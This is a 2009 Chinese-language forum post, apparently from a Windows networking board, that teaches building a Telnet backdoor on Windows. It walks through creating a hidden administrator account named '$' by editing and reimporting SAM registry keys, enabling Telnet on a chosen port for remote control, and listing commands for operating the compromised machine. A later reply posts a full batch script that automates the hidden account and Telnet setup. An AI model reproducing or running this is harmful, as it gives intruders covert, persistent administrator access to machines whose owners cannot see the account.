【原创】Telnet后门制作,附带 IIS 的组件文件,和 半自动生成Telnet后门 的批处理

dianyancao 2009-12-12 12:06:05
加精
半自动生成Telnet后门.rar(解压密码是:dianyancao@126.com)
http://www.nohack.cn/bbs/attachment.php?aid=MjE5MDN8MWMzYWU4ZTB8MTI2MDU5MDA1N3wxOWI1TmhoYW5NNUxDb3JsS014K2xHdjJOWno0Q250NmRoMDB2SUZCblYwdXc3Zw%3D%3D
组件文件.rar (解压密码是:dianyancao@126.com)
http://www.nohack.cn/bbs/viewthread.php?tid=111695&extra=
首先新建一个隐藏用户 $
具体操作:
新建用户 $ ,设置属性(用户不能更改密码)(密码永不到期)
并且为该用户设置较长的密码
打开用户 $ 的 属性的隶属于项
接着删除其中的Users组
并且把用户 $ 加入 Administrators组
在注册表中把 HKEY_LOCAL_MACHINE\SAM\SAM项的权限设置为
允许Administrators组完全控制,然后刷新该项
进入项 HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\$
找到用户 $ 的 默认值类型,记住该类型(0x???),并导出 $ 项为 "用户标识符.reg"
再进入项 HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users 之中
寻找和上面的类型相匹配的项,并将其导出为 "用户信息.reg"
最后在计算机用户管理中,删除用户 $ ,并导入上述两个注册表文件
再将用户 $ 加入 TelnetClients用户组
在计算机用户组管理中新建 TelnetClients 组
然后将用户 $ 添加成为 TelnetClients用户组 的成员


配置Telnet服务
在计算机服务管理中,启用Telnet服务,并将其 启动类型 设置为 自动
运行cmd.exe,开始命令行操作,输入命令:
tlntadmn config port= ???? &echo “????”是小于1024的正整数


测试Telnet服务
开始命令行操作,输入命令:
telnet 127.0.0.1 ???? &echo “????”是上面设置的Telnet服务端口
由于测试的是本机的Telnet,所以输入上述命令后有显示:
您将要把您的密码信息送到 Internet 区内的一台远程计算机上。这可能不安全。您还要送
吗(y/n):n
选择N,然后显示
Welcome to Microsoft Telnet Service

login: $
password:
输入用户名和密码,确定
若出现欢迎信息:Welcome to Microsoft Telnet Server.
那么就可以在网络上,用用户 $ 和密码,远程登录该计算机了。


使用Telnet进行远程控制
远程登录计算机控制台后,就可以用命令行操作运行程序了,使用方法和本地cmd相同。
推荐本地使用的命令:
ftp -? &echo 使用ftp命令需要远程系统添加Windows组件,即Internet 信息服务(IIS)

Transfers files to and from a computer running an FTP server service
(sometimes called a daemon). Ftp can be used interactively.

FTP [-v] [-d] [-i] [-n] [-g] [-s:filename] [-a] [-w:windowsize] [-A] [host]

-v Suppresses display of remote server responses.
-n Suppresses auto-login upon initial connection.
-i Turns off interactive prompting during multiple file
transfers.
-d Enables debugging.
-g Disables filename globbing (see GLOB command).
-s:filename Specifies a text file containing FTP commands; the
commands will automatically run after FTP starts.
-a Use any local interface when binding data connection.
-A login as anonymous.
-w:buffersize Overrides the default transfer buffer size of 4096.
host Specifies the host name or IP address of the remote
host to connect to.

Notes:
- mget and mput commands take y/n/q for yes/no/quit.
- Use Control-C to abort commands.

ftp -a 127.0.0.1
ftp> help
Commands may be abbreviated. Commands are:

! delete literal prompt send
? debug ls put status
append dir mdelete pwd trace
ascii disconnect mdir quit type
bell get mget quote user
binary glob mkdir recv verbose
bye hash mls remotehelp
cd help mput rename
close lcd open rmdir

C:\>net use /?
此命令的语法是:


NET USE
[devicename | *] [\\computername\sharename[\volume] [password | *]]
[/USER:[domainname\]username]
[/USER:[dotted domain name\]username]
[/USER:[username@dotted domain name]
[/SMARTCARD]
[/SAVECRED]
[[/DELETE] | [/PERSISTENT:{YES | NO}]]

NET USE {devicename | *} [password | *] /HOME

NET USE [/PERSISTENT:{YES | NO}]
示例:net use z: \\127.0.0.1\ipc$

推荐远程控制台的使用命令:

at /? &echo 用于在指定时间运行程序
reg /? &echo 用于修改注册表
attrib /? &echo 用于修改文件属性(隐藏,系统,只读)
net share /? &echo 用于开启共享
start /? &echo 用于立即执行指定程序
sc create /? &echo 用于生成服务
sc delete /? &echo 用于删除服务
sc query state= all >>c:\ServicesList.txt &echo 会生成所有服务详细信息到文本文件
shutdown -? &echo 用于关机,注销,重启
net start dot3svc &netsh lan reconnect interface="本地连接" &echo 重新启动“本地连接”
netsh interface ip set address "本地连接" static 192.168.1.24 255.255.255.0 192.168.1.1 1 &echo 修改本地连接的IP地址

附:(Internet 信息服务 IIS的添加)
打开§控制面板§,执行§添加删除程序§,点击§添加/删除Windows组件§,弹出§Windows 组件向导§
点击§Internet 信息服务(IIS)§,再点击§详细信息(D)...§,勾选§文件传输协议(FTP)服务§
系统将自动选择§Internet 信息服务管理单元§,§公用文件§和§文件传输协议(FTP)服务§,
如果需要§万维网服务§,也可选择上勾。选择完毕,单击确定,进行下一步,系统开始执行安装。
安装过程需要插入 XP系统的安装光盘,以便复制I386文件夹中的数据,当然也可以使用下面上传的§组件文件.RAR§
组件安装完成后,开始配置§Internet 信息服务§。
运行c:\windows\system32\inetsrv\iis.msc,打开Internet 信息服务
进入(本地计算机)的树形结构,进入§FTP 站点§,选择§默认 FTP 站点§的属性,开始设置。
点击§安全账户§,推荐选择只允许匿名连接(L),点击§主目录§,设置§本地路径§为你要共享的文件夹,拒绝写入,
即不勾选§写入(W)§,到此设置完毕,已经可以通过网址: ftp://127.0.0.1/,访问共享目录了。

...全文
2293 61 打赏 收藏 转发到动态 举报
写回复
用AI写文章
61 条回复
切换为时间正序
请发表友善的回复…
发表回复
沙河渔翁 2011-07-06
  • 打赏
  • 举报
回复
学习了,哈哈。
沙河渔翁 2011-06-27
  • 打赏
  • 举报
回复
小小一心 2011-03-26
  • 打赏
  • 举报
回复
链接没了。。不能下载。。
dianyancao 2010-10-26
  • 打赏
  • 举报
回复
更新一下,我真是Lazyboots
[code=Batch]
@echo off
title 生成Telnet远程登录
setlocal enabledelayedexpansion
if not exist "%windir%\system32\tlntsvr.exe" (
echo 找不到Telnet服务文件,请退出
pause
exit
)
sc config tlntsvr start= auto
sc start tlntsvr
cls
:a
set /p user=请输入用于Telnet登录的用户名:
if "!user!"=="" (
echo 用户名不能为空
goto a
)
set /p psw=请输入用于Telnet登录的密码:
set /p pswb=再次输入密码:
if not !psw!==!pswb! (
cls
echo 两次输入的密码不相同!
goto a
)
:b
set /p port=请输入要设置的Telnet服务端口,必须是小于1024的正整数:
echo !port!|findstr "^[0-9]*$">nul
if !errorlevel!==1 (
echo 请输入纯数字!
goto b
)
if !port! lss 1 ( echo 请输入小于1024的正整数!
echo 请输入大于1小于1024的整数!
goto b
)
if !port! geq 1024 (
echo 请输入小于1024的正整数!
goto b
)

cls
echo 用户名:!user!
echo 密码:!psw!
echo 端口:!port!
set /p y=确定吗?(y,n):
if not !y!==y (
cls
goto a
)

cd %temp%

net user "!user!" "!psw!" /add
net localgroup users "!user!" /del
net localgroup administrators "!user!" /add
echo HKEY_LOCAL_MACHINE\SAM\SAM [1 8 19] >regset.ini
echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account [1 8 9] >>regset.ini
echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users [1 8 9] >>regset.ini
echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names [1 8 9] >>regset.ini
echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\!user! [1 8 9] >>regset.ini
regini regset.ini
reg export "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\!user!" 1.reg
for /f "usebackq skip=3 tokens=2 delims=(" %%j in (`type 1.reg`) do set tt=%%j
echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\00000!tt:~0,-2! [1 8 9] >regset.ini
regini regset.ini
reg export "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\00000!tt:~0,-2!" 2.reg
net user "!user!" /del
reg import 1.reg
reg import 2.reg
del /f /a /q 1.reg
del /f /a /q 2.reg
echo HKEY_LOCAL_MACHINE\SAM\SAM [17] >regset.ini
regini regset.ini
del /f /a /q regset.ini
net localgroup TelnetClients /add
net localgroup telnetclients /comment:"TelnetClients 组中的成员被赋予远程登录计算机的权限"
net localgroup TelnetClients "!user!" /add

cls
color a
tlntadmn config port= !port!
echo 开始测试Telnet服务!
echo 登录用户名为:!user! ,密码是:!psw!
echo Telnet的端口为:!port!
pause
:c
telnet 127.0.0.1 !port!
if not !username!==$ (
echo 没有登录,重新测试吗?
echo 已经登录过了,请直接关闭本窗口!
pause
goto c
)
[/code]
l731592573 2010-05-11
  • 打赏
  • 举报
回复
牛人再现,不得不来此地留下一点痕迹
macklau 2010-05-07
  • 打赏
  • 举报
回复
learning..............
LB3690 2010-03-24
  • 打赏
  • 举报
回复
有意思,崤崤
asharpnet 2010-01-18
  • 打赏
  • 举报
回复
mark
天王 2010-01-15
  • 打赏
  • 举报
回复
先收藏了 哈哈
Micky米 2009-12-22
  • 打赏
  • 举报
回复
学习
cdcjk 2009-12-21
  • 打赏
  • 举报
回复
学习
Teng_s2000 2009-12-21
  • 打赏
  • 举报
回复
study
agel0ver 2009-12-21
  • 打赏
  • 举报
回复
ding.........
ahead_8 2009-12-20
  • 打赏
  • 举报
回复
Mark先。
nettman 2009-12-20
  • 打赏
  • 举报
回复
呵呵,收藏!
YHL27 2009-12-20
  • 打赏
  • 举报
回复
sf!
xzhong19856 2009-12-20
  • 打赏
  • 举报
回复
飘过
z_wenyong 2009-12-19
  • 打赏
  • 举报
回复
谢谢分享
村过去 2009-12-19
  • 打赏
  • 举报
回复
[Quote=引用 37 楼 fredjiang_sh 的回复:]
高手,会玩smtp吗?
[/Quote]

Stmp我就会,哈哈~~
村过去 2009-12-19
  • 打赏
  • 举报
回复
MARK!以后有兴趣再看
加载更多回复(37)

6,184

社区成员

发帖
与我相关
我的任务
社区描述
windows网络管理与配置
社区管理员
  • 网络管理与配置社区
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧